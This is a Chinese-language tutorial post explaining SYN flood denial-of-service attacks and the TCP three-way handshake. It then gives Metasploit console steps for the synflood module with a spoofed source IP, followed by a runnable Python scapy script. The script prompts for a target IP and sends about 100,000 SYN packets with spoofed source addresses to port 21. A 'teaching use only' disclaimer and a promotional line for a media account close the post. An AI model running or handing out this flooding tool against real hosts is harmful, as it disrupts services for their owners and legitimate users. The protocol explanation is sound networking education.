Python编写exp实现 SYN Flood攻击

1 SYN Flood介绍

SYN-Flood攻击是当前网络上最为常见的DDoS（分布式拒绝服务）攻击，也是最为经典的拒绝服务攻击，它利用了TCP协议实现上的一个缺陷，通过向网络服务所在端口发送大量的伪造源地址的攻击报文，就可能造成目标服务器中的半开连接队列被占满，从而阻止其他合法用户进行访问。这种攻击早在1996年就被发现，但至今仍然显示出强大的生命力。很多操作系统，甚至防火墙、路由器都无法有效地防御这种攻击，而且由于它可以方便地伪造源地址，追查起来非常困难。它的数据包特征通常是，源发送了大量的SYN包，并且缺少三次握手的最后一步握手ACK回复。

2 SYN -tcp 三次握手过程：

在建立链接前，服务器已经开启，等待来自客户端(无论浏览器还是app等，此处把用户侧都称之为客户端)的请求。

1.请求由客户端主动发出，TCP数据报的SYN字段设置为1，咱们暂且把此报文成为SYN报文。SYN报文虽然不携带实际传输的数据，但是它依旧要消耗一个序号，假设此报文的序号seq=x。客户端发出请求连接的报文之后，进入SYN-SENT(同步已发出)状态。

2.当服务器接收到来自客户端的请求报文后，会记录下此客户端的信息。并且对客户端发送的SYN报文进行确认，确认报文的ACK字段设置为1，同时SYN设置为1，不妨称此报文为ACK+SYN报文。因为是对SYN报文的确认，且SYN未携带数据，所以ACK+SYN报文的ack=x + 1 (表示服务器期望下一次从客户端A接收到序号为x+1的报文)。假设此时ACK+SYN报文序号为seq=y。发出ACK+SYN报文后，服务器进入SYN-RCVD状态(同步已发出状态)

3.客户端收到来服务器的ACK+SYN报文之后，会对它进行确认，发送确认报文ACK设置为1，seq=x+1，ack = y+1 后，客户端进入连接建立状态。在收到此确认报文之后，服务器也进入链接建立状态。此时就完成了三次握手，双发可以进行数据通信了。

3 MSF实现SYN-Flood攻击

1.在kali主机中打开wireshark，监听网络数据包的传输。

2.Msfconsole

3.Use auxiliary/dos/tcp/synflflood

4.Set rhost 192.168.111.129

5.Set rport 135

6.Set shost 61.61.61.61 //设置虚构的IP地址

7.Exploit

8.Kali中打开Wireshark监听

4 Python实现SYN-Flood攻击

#coding=utf-8

#python3.7环境

"""

@author xxx

Create on 4.16.2020

使用代码发送100000万个SYN包，源IP地址伪装为1.1.1.1~254随机选择，源端口 49151~65535范围内，目标IP：192.168.1.8 ，目标端口21

教学使用，不得用于其他用途，否则后果自负！！

"""

from scapy.all import *
import random
dst_ip = input("请输入你要攻击的目标IP：")
for i in range(0,99999):
    random_ip = '1.'+'1.'+'1.'+str(random.randrange(1,254))
    random_Sport = random.randrange(49151,65535)
    ip = IP(src = random_ip,dst = dst_ip)
    packet = TCP(sport = random_Sport,dport = 21,flags = 'S',seq = 1111111)
    synpacker = (ip/packet)
    send(synpacker)

关注知了汇智头条号，干货持续奉送。